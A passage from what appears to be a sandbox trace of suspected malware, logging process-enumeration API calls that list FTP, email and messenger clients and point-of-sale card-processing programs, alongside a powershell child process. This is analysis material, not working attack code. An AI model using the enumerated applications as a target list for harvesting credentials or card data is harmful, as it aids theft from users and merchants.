th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.576] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0186.577] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0186.579] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.581] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.582] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0186.584] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0186.586] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0186.587] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0186.589] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0186.590] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0186.592] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0186.594] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0186.596] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0186.597] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0186.602] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0186.650] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0186.651] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0186.653] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0186.655] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0186.657] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0186.658] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0186.660] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0186.661] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0186.663] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0186.665] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0186.667] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0186.669] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0186.671] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0186.673] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0186.675] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0186.677] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0186.679] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0186.681] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0186.683] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0186.745] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0186.747] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0186.750] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0186.752] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0186.754] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0186.756] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0186.758] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0186.763] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0186.765] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0186.767] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0186.769] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0186.771] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0186.773] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0186.775] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0186.777] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0186.779] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0186.781] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0186.821] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0186.823] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0186.824] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0186.826] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0186.828] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0186.830] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0186.832] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0186.834] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0186.836] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0186.837] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0186.839] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0186.841] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0186.843] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0186.844] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0186.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0186.848] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0186.849] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0186.852] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0186.854] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0186.898] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.900] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0186.901] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0186.903] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.905] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.906] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0186.908] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.910] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0186.911] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0186.914] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0186.916] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0186.917] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, 